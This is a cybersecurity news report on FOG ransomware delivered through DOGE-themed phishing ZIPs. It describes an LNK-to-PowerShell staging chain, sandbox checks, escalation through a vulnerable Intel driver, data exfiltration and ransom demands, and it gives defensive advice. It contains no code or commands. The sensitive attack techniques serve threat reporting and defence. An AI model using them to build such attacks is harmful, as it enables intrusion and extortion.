Cybercriminals Distribute FOG Ransomware Masquerading as DOGE in Phishing Emails

Cybercriminals are distributing the FOG ransomware family by disguising payloads as Department of Government Efficiency (DOGE) communications, leveraging both phishing emails and references to current U.S. government initiatives.

Security analysts at Trend Vision One have detected and blocked multiple samples of FOG ransomware, which are being propagated through compressed email attachments, specifically ZIP archives named “Pay Adjustment.zip” that contain malicious LNK shortcut files.

Sophisticated Attack Chain Exploiting Government-Related References

Between March 27 and April 2, at least nine distinct FOG ransomware variants were uploaded to VirusTotal, each exhibiting the “.flocked” file extension and accompanied by readme.txt ransom notes.

These notes frequently reference the DOGE program an initiative in the public eye due to recent allegations involving insider assistance to cybercriminal groups.

The ransom note also prompts recipients to propagate the infection by executing an embedded payload distribution code.

Upon execution, the attack chain is initiated by the LNK file, which masquerades as a PDF document. The file triggers a PowerShell command, downloading and running a script dubbed “stage1.ps1.”

This multi-stage PowerShell script fetches additional malicious binaries such as a ransomware loader (cwiper.exe), privilege escalation tool (ktool.exe), and various data-harvesting PowerShell scripts (including lootsubmit.ps1 and trackerjacker.ps1).

Notably, these scripts exfiltrate sensitive system and network information to remote servers, attempt to determine the infected host’s geolocation, and even incorporate politically charged commentary within the script.

Campaign Delivers Multi-Stage Payloads via Phishing, Targeting Multiple Industries

The payload deployment process is technically sophisticated. The ransomware loader performs multiple sandbox checks including validation of RAM, CPU count, and registry keys terminating execution if it detects a virtualized analysis environment.

If the checks pass, the loader decrypts and executes the FOG ransomware binary using a specified key, drops a log file (dbgLog.sys) to monitor encryption activities, and presents ransom instructions to the victim.

A critical component, ktool.exe, exploits a vulnerability in the Intel Network Adapter Diagnostic Driver (iQVW64.sys), extracted temporarily to the system for privilege escalation.

This allows the ransomware to gain higher system privileges and maximize impact.

Further investigation revealed additional tactics, including the use of QR codes directing victims to Monero cryptocurrency wallets, and updated MAC address resolution logic for enhanced victim tracking.

Victim sectors are widespread, with FOG ransomware impacting technology, education, manufacturing, transportation, and service industries.

Since June 2024, 173 ransomware detections have been attributed to FOG in Trend Vision One customer telemetry, with incidents peaking in February.

Security experts caution that the group behind FOG ransomware either belongs to the original operator set or comprises opportunistic actors repackaging the malware to exploit current governmental narratives and social engineering themes.

The use of DOGE-related references appears intended to increase credibility and incite urgency among recipients.

To defend against such threats, organizations are urged to monitor indicators of compromise, maintain updated offline backups, implement robust network segmentation, and rigorously patch software vulnerabilities.

Regular staff training on phishing awareness further reduces susceptibility to these sophisticated attack chains.

Enterprises are reminded that, despite the evolving tactics, the fundamental impact of ransomware financial loss and operational disruption remains severe.

Vigilance, automation of threat detection, and up-to-date defense strategies are essential in countering these advanced cyber threats.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates